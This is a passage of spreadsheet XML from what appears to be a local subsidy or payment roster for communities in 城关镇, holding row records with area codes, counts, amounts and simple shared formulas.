        <v>2585</v>
      </c>
      <c r="E966" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F966" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G966" s="24">
        <v>2</v>
      </c>
      <c r="H966" s="25">
        <v>325</v>
      </c>
      <c r="I966" s="24">
        <f t="shared" si="15"/>
        <v>650</v>
      </c>
      <c r="J966" s="41">
        <v>45108</v>
      </c>
      <c r="K966" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="967" customHeight="1" spans="1:11">
      <c r="A967" s="23" t="s">
        <v>2586</v>
      </c>
      <c r="B967" s="24" t="str">
        <f>B966</f>
        <v>城关镇</v>
      </c>
      <c r="C967" s="24" t="str">
        <f>C966</f>
        <v>民主社区工信局</v>
      </c>
      <c r="D967" s="30" t="s">
        <v>2587</v>
      </c>
      <c r="E967" s="30" t="s">
        <v>1250</v>
      </c>
      <c r="F967" s="24" t="str">
        <f>F966</f>
        <v>4113210105</v>
      </c>
      <c r="G967" s="24"/>
      <c r="H967" s="24"/>
      <c r="I967" s="24">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="J967" s="41"/>
      <c r="K967" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="968" customHeight="1" spans="1:11">
      <c r="A968" s="23" t="s">
        <v>2588</v>
      </c>
      <c r="B968" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C968" s="24" t="s">
        <v>2584</v>
      </c>
      <c r="D968" s="24" t="s">
        <v>2589</v>
      </c>
      <c r="E968" s="24" t="s">
        <v>303</v>
      </c>
      <c r="F968" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G968" s="24">
        <v>2</v>
      </c>
      <c r="H968" s="25">
        <v>325</v>
      </c>
      <c r="I968" s="24">
        <f t="shared" si="15"/>
        <v>650</v>
      </c>
      <c r="J968" s="41">
        <v>45108</v>
      </c>
      <c r="K968" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="969" customHeight="1" spans="1:11">
      <c r="A969" s="23" t="s">
        <v>2590</v>
      </c>
      <c r="B969" s="24" t="str">
        <f>B968</f>
        <v>城关镇</v>
      </c>
      <c r="C969" s="24" t="str">
        <f>C968</f>
        <v>民主社区工信局</v>
      </c>
      <c r="D969" s="23" t="s">
        <v>2591</v>
      </c>
      <c r="E969" s="24" t="s">
        <v>980</v>
      </c>
      <c r="F969" s="24" t="str">
        <f>F968</f>
        <v>4113210105</v>
      </c>
      <c r="G969" s="24"/>
      <c r="H969" s="24"/>
      <c r="I969" s="24">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="J969" s="41"/>
      <c r="K969" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="970" customHeight="1" spans="1:11">
      <c r="A970" s="23" t="s">
        <v>2592</v>
      </c>
      <c r="B970" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C970" s="24" t="s">
        <v>2584</v>
      </c>
      <c r="D970" s="24" t="s">
        <v>2593</v>
      </c>
      <c r="E970" s="24" t="s">
        <v>360</v>
      </c>
      <c r="F970" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G970" s="24">
        <v>1</v>
      </c>
      <c r="H970" s="25">
        <v>365</v>
      </c>
      <c r="I970" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J970" s="41">
        <v>45108</v>
      </c>
      <c r="K970" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="971" customHeight="1" spans="1:11">
      <c r="A971" s="23" t="s">
        <v>2594</v>
      </c>
      <c r="B971" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C971" s="24" t="s">
        <v>2584</v>
      </c>
      <c r="D971" s="24" t="s">
        <v>2595</v>
      </c>
      <c r="E971" s="24" t="s">
        <v>509</v>
      </c>
      <c r="F971" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G971" s="24">
        <v>1</v>
      </c>
      <c r="H971" s="25">
        <v>365</v>
      </c>
      <c r="I971" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J971" s="41">
        <v>45108</v>
      </c>
      <c r="K971" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="972" customHeight="1" spans="1:11">
      <c r="A972" s="23" t="s">
        <v>2596</v>
      </c>
      <c r="B972" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C972" s="24" t="s">
        <v>2584</v>
      </c>
      <c r="D972" s="24" t="s">
        <v>2597</v>
      </c>
      <c r="E972" s="24" t="s">
        <v>627</v>
      </c>
      <c r="F972" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G972" s="24">
        <v>1</v>
      </c>
      <c r="H972" s="25">
        <v>365</v>
      </c>
      <c r="I972" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J972" s="41">
        <v>45108</v>
      </c>
      <c r="K972" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="973" customHeight="1" spans="1:11">
      <c r="A973" s="23" t="s">
        <v>2598</v>
      </c>
      <c r="B973" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C973" s="24" t="s">
        <v>2584</v>
      </c>
      <c r="D973" s="24" t="s">
        <v>2599</v>
      </c>
      <c r="E973" s="24" t="s">
        <v>2600</v>
      </c>
      <c r="F973" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G973" s="24">
        <v>2</v>
      </c>
      <c r="H973" s="25">
        <v>325</v>
      </c>
      <c r="I973" s="24">
        <f t="shared" si="15"/>
        <v>650</v>
      </c>
      <c r="J973" s="41">
        <v>45108</v>
      </c>
      <c r="K973" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="974" customHeight="1" spans="1:11">
      <c r="A974" s="23" t="s">
        <v>2601</v>
      </c>
      <c r="B974" s="24" t="str">
        <f>B973</f>
        <v>城关镇</v>
      </c>
      <c r="C974" s="24" t="str">
        <f>C973</f>
        <v>民主社区工信局</v>
      </c>
      <c r="D974" s="30" t="s">
        <v>2602</v>
      </c>
      <c r="E974" s="30" t="s">
        <v>2603</v>
      </c>
      <c r="F974" s="24" t="str">
        <f>F973</f>
        <v>4113210105</v>
      </c>
      <c r="G974" s="24"/>
      <c r="H974" s="24"/>
      <c r="I974" s="24">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="J974" s="41"/>
      <c r="K974" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="975" customHeight="1" spans="1:11">
      <c r="A975" s="23" t="s">
        <v>2604</v>
      </c>
      <c r="B975" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C975" s="24" t="s">
        <v>2584</v>
      </c>
      <c r="D975" s="24" t="s">
        <v>2605</v>
      </c>
      <c r="E975" s="24" t="s">
        <v>2606</v>
      </c>
      <c r="F975" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G975" s="24">
        <v>1</v>
      </c>
      <c r="H975" s="25">
        <v>365</v>
      </c>
      <c r="I975" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J975" s="41">
        <v>45108</v>
      </c>
      <c r="K975" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="976" customHeight="1" spans="1:11">
      <c r="A976" s="23" t="s">
        <v>2607</v>
      </c>
      <c r="B976" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C976" s="24" t="s">
        <v>2584</v>
      </c>
      <c r="D976" s="24" t="s">
        <v>2156</v>
      </c>
      <c r="E976" s="24" t="s">
        <v>543</v>
      </c>
      <c r="F976" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G976" s="24">
        <v>1</v>
      </c>
      <c r="H976" s="24">
        <v>500</v>
      </c>
      <c r="I976" s="24">
        <f t="shared" si="15"/>
        <v>500</v>
      </c>
      <c r="J976" s="41">
        <v>45108</v>
      </c>
      <c r="K976" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="977" customHeight="1" spans="1:11">
      <c r="A977" s="23" t="s">
        <v>2608</v>
      </c>
      <c r="B977" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C977" s="24" t="s">
        <v>2609</v>
      </c>
      <c r="D977" s="24" t="s">
        <v>2610</v>
      </c>
      <c r="E977" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F977" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G977" s="24">
        <v>2</v>
      </c>
      <c r="H977" s="25">
        <v>325</v>
      </c>
      <c r="I977" s="24">
        <f t="shared" si="15"/>
        <v>650</v>
      </c>
      <c r="J977" s="41">
        <v>45108</v>
      </c>
      <c r="K977" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="978" customHeight="1" spans="1:11">
      <c r="A978" s="23" t="s">
        <v>2611</v>
      </c>
      <c r="B978" s="24" t="str">
        <f>B977</f>
        <v>城关镇</v>
      </c>
      <c r="C978" s="24" t="str">
        <f>C977</f>
        <v>民主社区县社</v>
      </c>
      <c r="D978" s="31" t="s">
        <v>2612</v>
      </c>
      <c r="E978" s="32" t="s">
        <v>1963</v>
      </c>
      <c r="F978" s="24" t="str">
        <f>F977</f>
        <v>4113210105</v>
      </c>
      <c r="G978" s="24"/>
      <c r="H978" s="24"/>
      <c r="I978" s="24">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="J978" s="41"/>
      <c r="K978" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="979" customHeight="1" spans="1:11">
      <c r="A979" s="23" t="s">
        <v>2613</v>
      </c>
      <c r="B979" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C979" s="24" t="s">
        <v>2584</v>
      </c>
      <c r="D979" s="24" t="s">
        <v>2614</v>
      </c>
      <c r="E979" s="24" t="s">
        <v>866</v>
      </c>
      <c r="F979" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G979" s="24">
        <v>1</v>
      </c>
      <c r="H979" s="25">
        <v>365</v>
      </c>
      <c r="I979" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J979" s="41">
        <v>45108</v>
      </c>
      <c r="K979" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="980" customHeight="1" spans="1:11">
      <c r="A980" s="23" t="s">
        <v>2615</v>
      </c>
      <c r="B980" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C980" s="24" t="s">
        <v>2584</v>
      </c>
      <c r="D980" s="24" t="s">
        <v>2616</v>
      </c>
      <c r="E980" s="24" t="s">
        <v>232</v>
      </c>
      <c r="F980" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G980" s="24">
        <v>1</v>
      </c>
      <c r="H980" s="25">
        <v>365</v>
      </c>
      <c r="I980" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J980" s="41">
        <v>45108</v>
      </c>
      <c r="K980" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="981" customHeight="1" spans="1:11">
      <c r="A981" s="23" t="s">
        <v>2617</v>
      </c>
      <c r="B981" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C981" s="24" t="s">
        <v>2618</v>
      </c>
      <c r="D981" s="24" t="s">
        <v>2619</v>
      </c>
      <c r="E981" s="24" t="s">
        <v>2620</v>
      </c>
      <c r="F981" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G981" s="24">
        <v>1</v>
      </c>
      <c r="H981" s="25">
        <v>365</v>
      </c>
      <c r="I981" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J981" s="41">
        <v>45108</v>
      </c>
      <c r="K981" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="982" customHeight="1" spans="1:11">
      <c r="A982" s="23" t="s">
        <v>2621</v>
      </c>
      <c r="B982" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C982" s="24" t="s">
        <v>2609</v>
      </c>
      <c r="D982" s="24" t="s">
        <v>2622</v>
      </c>
      <c r="E982" s="24" t="s">
        <v>281</v>
      </c>
      <c r="F982" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G982" s="24">
        <v>1</v>
      </c>
      <c r="H982" s="25">
        <v>365</v>
      </c>
      <c r="I982" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J982" s="41">
        <v>45108</v>
      </c>
      <c r="K982" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="983" customHeight="1" spans="1:11">
      <c r="A983" s="23" t="s">
        <v>2623</v>
      </c>
      <c r="B983" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C983" s="24" t="s">
        <v>2618</v>
      </c>
      <c r="D983" s="24" t="s">
        <v>2624</v>
      </c>
      <c r="E983" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F983" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G983" s="24">
        <v>1</v>
      </c>
      <c r="H983" s="25">
        <v>365</v>
      </c>
      <c r="I983" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J983" s="41">
        <v>45108</v>
      </c>
      <c r="K983" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="984" customHeight="1" spans="1:11">
      <c r="A984" s="23" t="s">
        <v>2625</v>
      </c>
      <c r="B984" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C984" s="24" t="s">
        <v>2618</v>
      </c>
      <c r="D984" s="24" t="s">
        <v>2626</v>
      </c>
      <c r="E984" s="24" t="s">
        <v>2627</v>
      </c>
      <c r="F984" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G984" s="24">
        <v>1</v>
      </c>
      <c r="H984" s="25">
        <v>365</v>
      </c>
      <c r="I984" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J984" s="41">
        <v>45108</v>
      </c>
      <c r="K984" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="985" customHeight="1" spans="1:11">
      <c r="A985" s="23" t="s">
        <v>2628</v>
      </c>
      <c r="B985" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C985" s="24" t="s">
        <v>2629</v>
      </c>
      <c r="D985" s="24" t="s">
        <v>2630</v>
      </c>
      <c r="E985" s="24" t="s">
        <v>2631</v>
      </c>
      <c r="F985" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G985" s="24">
        <v>1</v>
      </c>
      <c r="H985" s="25">
        <v>365</v>
      </c>
      <c r="I985" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J985" s="41">
        <v>45108</v>
      </c>
      <c r="K985" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="986" customHeight="1" spans="1:11">
      <c r="A986" s="23" t="s">
        <v>2632</v>
      </c>
      <c r="B986" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C986" s="24" t="s">
        <v>2633</v>
      </c>
      <c r="D986" s="24" t="s">
        <v>2634</v>
      </c>
      <c r="E986" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F986" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G986" s="24">
        <v>2</v>
      </c>
      <c r="H986" s="25">
        <v>325</v>
      </c>
      <c r="I986" s="24">
        <f t="shared" si="15"/>
        <v>650</v>
      </c>
      <c r="J986" s="41">
        <v>45108</v>
      </c>
      <c r="K986" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="987" customHeight="1" spans="1:11">
      <c r="A987" s="23" t="s">
        <v>2635</v>
      </c>
      <c r="B987" s="24" t="str">
        <f>B986</f>
        <v>城关镇</v>
      </c>
      <c r="C987" s="24" t="str">
        <f>C986</f>
        <v>北外社区工信局</v>
      </c>
      <c r="D987" s="23" t="s">
        <v>2636</v>
      </c>
      <c r="E987" s="23" t="s">
        <v>2637</v>
      </c>
      <c r="F987" s="24" t="str">
        <f>F986</f>
        <v>4113210102</v>
      </c>
      <c r="G987" s="24"/>
      <c r="H987" s="24"/>
      <c r="I987" s="24">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="J987" s="41"/>
      <c r="K987" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="988" customHeight="1" spans="1:11">
      <c r="A988" s="23" t="s">
        <v>2638</v>
      </c>
      <c r="B988" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C988" s="24" t="s">
        <v>2639</v>
      </c>
      <c r="D988" s="24" t="s">
        <v>2640</v>
      </c>
      <c r="E988" s="24" t="s">
        <v>337</v>
      </c>
      <c r="F988" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G988" s="24">
        <v>1</v>
      </c>
      <c r="H988" s="25">
        <v>365</v>
      </c>
      <c r="I988" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J988" s="41">
        <v>45108</v>
      </c>
      <c r="K988" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="989" customHeight="1" spans="1:11">
      <c r="A989" s="23" t="s">
        <v>2641</v>
      </c>
      <c r="B989" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C989" s="24" t="s">
        <v>2642</v>
      </c>
      <c r="D989" s="24" t="s">
        <v>2643</v>
      </c>
      <c r="E989" s="24" t="s">
        <v>611</v>
      </c>
      <c r="F989" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G989" s="24">
        <v>1</v>
      </c>
      <c r="H989" s="25">
        <v>365</v>
      </c>
      <c r="I989" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J989" s="41">
        <v>45108</v>
      </c>
      <c r="K989" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="990" customHeight="1" spans="1:11">
      <c r="A990" s="23" t="s">
        <v>2644</v>
      </c>
      <c r="B990" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C990" s="24" t="s">
        <v>2629</v>
      </c>
      <c r="D990" s="24" t="s">
        <v>1686</v>
      </c>
      <c r="E990" s="24" t="s">
        <v>2645</v>
      </c>
      <c r="F990" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G990" s="24">
        <v>1</v>
      </c>
      <c r="H990" s="25">
        <v>365</v>
      </c>
      <c r="I990" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J990" s="41">
        <v>45108</v>
      </c>
      <c r="K990" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="991" customHeight="1" spans="1:11">
      <c r="A991" s="23" t="s">
        <v>2646</v>
      </c>
      <c r="B991" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C991" s="24" t="s">
        <v>2629</v>
      </c>
      <c r="D991" s="24" t="s">
        <v>2647</v>
      </c>
      <c r="E991" s="24" t="s">
        <v>432</v>
      </c>
      <c r="F991" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G991" s="24">
        <v>1</v>
      </c>
      <c r="H991" s="25">
        <v>365</v>
      </c>
      <c r="I991" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J991" s="41">
        <v>45108</v>
      </c>
      <c r="K991" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="992" customHeight="1" spans="1:11">
      <c r="A992" s="23" t="s">
        <v>2648</v>
      </c>
      <c r="B992" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C992" s="24" t="s">
        <v>2633</v>
      </c>
      <c r="D992" s="24" t="s">
        <v>2649</v>
      </c>
      <c r="E992" s="24" t="s">
        <v>561</v>
      </c>
      <c r="F992" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G992" s="24">
        <v>2</v>
      </c>
      <c r="H992" s="25">
        <v>325</v>
      </c>
      <c r="I992" s="24">
        <f t="shared" si="15"/>
        <v>650</v>
      </c>
      <c r="J992" s="41">
        <v>45108</v>
      </c>
      <c r="K992" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="993" customHeight="1" spans="1:11">
      <c r="A993" s="23" t="s">
        <v>2650</v>
      </c>
      <c r="B993" s="24" t="str">
        <f>B992</f>
        <v>城关镇</v>
      </c>
      <c r="C993" s="24" t="str">
        <f>C992</f>
        <v>北外社区工信局</v>
      </c>
      <c r="D993" s="23" t="s">
        <v>2651</v>
      </c>
      <c r="E993" s="23" t="s">
        <v>2652</v>
      </c>
      <c r="F993" s="24" t="str">
        <f>F992</f>
        <v>4113210102</v>
      </c>
      <c r="G993" s="24"/>
      <c r="H993" s="24"/>
      <c r="I993" s="24">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="J993" s="41"/>
      <c r="K993" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="994" customHeight="1" spans="1:11">
      <c r="A994" s="23" t="s">
        <v>2653</v>
      </c>
      <c r="B994" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C994" s="24" t="s">
        <v>2633</v>
      </c>
      <c r="D994" s="24" t="s">
        <v>2654</v>
      </c>
      <c r="E994" s="24" t="s">
        <v>697</v>
      </c>
      <c r="F994" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G994" s="24">
        <v>1</v>
      </c>
      <c r="H994" s="25">
        <v>365</v>
      </c>
      <c r="I994" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J994" s="41">
        <v>45108</v>
      </c>
      <c r="K994" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="995" customHeight="1" spans="1:11">
      <c r="A995" s="23" t="s">
        <v>2655</v>
      </c>
      <c r="B995" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C995" s="24" t="s">
        <v>2633</v>
      </c>
      <c r="D995" s="24" t="s">
        <v>2656</v>
      </c>
      <c r="E995" s="24" t="s">
        <v>303</v>
      </c>
      <c r="F995" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G995" s="24">
        <v>1</v>
      </c>
      <c r="H995" s="25">
        <v>365</v>
      </c>
      <c r="I995" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J995" s="41">
        <v>45108</v>
      </c>
      <c r="K995" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="996" customHeight="1" spans="1:11">
      <c r="A996" s="23" t="s">
        <v>2657</v>
      </c>
      <c r="B996" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C996" s="24" t="s">
        <v>2633</v>
      </c>
      <c r="D996" s="24" t="s">
        <v>2658</v>
      </c>
      <c r="E996" s="24" t="s">
        <v>2659</v>
      </c>
      <c r="F996" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G996" s="24">
        <v>1</v>
      </c>
      <c r="H996" s="25">
        <v>365</v>
      </c>
      <c r="I996" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J996" s="41">
        <v>45108</v>
      </c>
      <c r="K996" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="997" customHeight="1" spans="1:11">
      <c r="A997" s="23" t="s">
        <v>2660</v>
      </c>
      <c r="B997" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C997" s="24" t="s">
        <v>2633</v>
      </c>
      <c r="D997" s="24" t="s">
        <v>2661</v>
      </c>
      <c r="E997" s="24" t="s">
        <v>2662</v>
      </c>
      <c r="F997" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G997" s="24">
        <v>1</v>
      </c>
      <c r="H997" s="25">
        <v>365</v>
      </c>
      <c r="I997" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J997" s="41">
        <v>45108</v>
      </c>
      <c r="K997" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="998" customHeight="1" spans="1:11">
      <c r="A998" s="23" t="s">
        <v>2663</v>
      </c>
      <c r="B998" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C998" s="24" t="s">
        <v>2633</v>
      </c>
      <c r="D998" s="24" t="s">
        <v>2664</v>
      </c>
      <c r="E998" s="24" t="s">
        <v>281</v>
      </c>
      <c r="F998" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G998" s="24">
        <v>2</v>
      </c>
      <c r="H998" s="25">
        <v>325</v>
      </c>
      <c r="I998" s="24">
        <f t="shared" si="15"/>
        <v>650</v>
      </c>
      <c r="J998" s="41">
        <v>45108</v>
      </c>
      <c r="K998" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="999" customHeight="1" spans="1:11">
      <c r="A999" s="23" t="s">
        <v>2665</v>
      </c>
      <c r="B999" s="24" t="str">
        <f>B998</f>
        <v>城关镇</v>
      </c>
      <c r="C999" s="24" t="str">
        <f>C998</f>
        <v>北外社区工信局</v>
      </c>
      <c r="D999" s="31" t="s">
        <v>2666</v>
      </c>
      <c r="E999" s="31" t="s">
        <v>2667</v>
      </c>
      <c r="F999" s="24" t="str">
        <f>F998</f>
        <v>4113210102</v>
      </c>
      <c r="G999" s="24"/>
      <c r="H999" s="24"/>
      <c r="I999" s="24">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="J999" s="41"/>
      <c r="K999" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1000" customHeight="1" spans="1:11">
      <c r="A1000" s="23" t="s">
        <v>2668</v>
      </c>
      <c r="B1000" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1000" s="24" t="s">
        <v>2633</v>
      </c>
      <c r="D1000" s="24" t="s">
        <v>2669</v>
      </c>
      <c r="E1000" s="24" t="s">
        <v>1459</v>
      </c>
      <c r="F1000" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G1000" s="24">
        <v>2</v>
      </c>
      <c r="H1000" s="25">
        <v>325</v>
      </c>
      <c r="I1000" s="24">
        <f t="shared" si="15"/>
        <v>650</v>
      </c>
      <c r="J1000" s="41">
        <v>45108</v>
      </c>
      <c r="K1000" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1001" customHeight="1" spans="1:11">
      <c r="A1001" s="23" t="s">
        <v>2670</v>
      </c>
      <c r="B1001" s="24" t="str">
        <f>B1000</f>
        <v>城关镇</v>
      </c>
      <c r="C1001" s="24" t="str">
        <f>C1000</f>
        <v>北外社区工信局</v>
      </c>
      <c r="D1001" s="30" t="s">
        <v>2671</v>
      </c>
      <c r="E1001" s="30" t="s">
        <v>2282</v>
      </c>
      <c r="F1001" s="24" t="str">
        <f>F1000</f>
        <v>4113210102</v>
      </c>
      <c r="G1001" s="24"/>
      <c r="H1001" s="24"/>
      <c r="I1001" s="24">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="J1001" s="41"/>
      <c r="K1001" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1002" customHeight="1" spans="1:11">
      <c r="A1002" s="23" t="s">
        <v>2672</v>
      </c>
      <c r="B1002" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1002" s="24" t="s">
        <v>2051</v>
      </c>
      <c r="D1002" s="24" t="s">
        <v>2673</v>
      </c>
      <c r="E1002" s="24" t="s">
        <v>435</v>
      </c>
      <c r="F1002" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G1002" s="24">
        <v>1</v>
      </c>
      <c r="H1002" s="25">
        <v>365</v>
      </c>
      <c r="I1002" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1002" s="41">
        <v>45108</v>
      </c>
      <c r="K1002" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1003" customHeight="1" spans="1:11">
      <c r="A1003" s="23" t="s">
        <v>2674</v>
      </c>
      <c r="B1003" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1003" s="24" t="s">
        <v>2035</v>
      </c>
      <c r="D1003" s="24" t="s">
        <v>2675</v>
      </c>
      <c r="E1003" s="24" t="s">
        <v>1257</v>
      </c>
      <c r="F1003" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G1003" s="24">
        <v>1</v>
      </c>
      <c r="H1003" s="25">
        <v>365</v>
      </c>
      <c r="I1003" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J1003" s="41">
        <v>45108</v>
      </c>
      <c r="K1003" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1004" customHeight="1" spans="1:11">
      <c r="A1004" s="23" t="s">
        <v>2676</v>
      </c>
      <c r="B1004" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1004" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1004" s="24" t="s">
        <v>2677</v>
      </c>
      <c r="E1004" s="24" t="s">
        <v>232</v>
      </c>
      <c r="F1004" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1004" s="24">
        <v>2</v>
      </c>
      <c r="H1004" s="25">
        <v>325</v>
      </c>
      <c r="I1004" s="24">
        <f t="shared" si="15"/>
        <v>650</v>
      </c>
      <c r="J1004" s="41">
        <v>45108</v>
      </c>
      <c r="K1004" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1005" customHeight="1" spans="1:11">
      <c r="A1005" s="23" t="s">
        <v>2678</v>
      </c>
      <c r="B1005" s="24" t="str">
        <f>B1004</f>
        <v>城关镇</v>
      </c>
      <c r="C1005" s="24" t="str">
        <f>C1004</f>
        <v>中华社区</v>
      </c>
      <c r="D1005" s="30" t="s">
        <v>2679</v>
      </c>
      <c r="E1005" s="30" t="s">
        <v>2680</v>
      </c>
      <c r="F1005" s="24" t="str">
        <f>F1004</f>
        <v>4113210108</v>
      </c>
      <c r="G1005" s="24"/>
      <c r="H1005" s="24"/>
      <c r="I1005" s="24">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="J1005" s="41"/>
      <c r="K1005" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1006" customHeight="1" spans="1:11">
      <c r="A1006" s="23" t="s">
        <v>2681</v>
      </c>
      <c r="B1006" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1006" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1006" s="24" t="s">
        <v>2682</v>
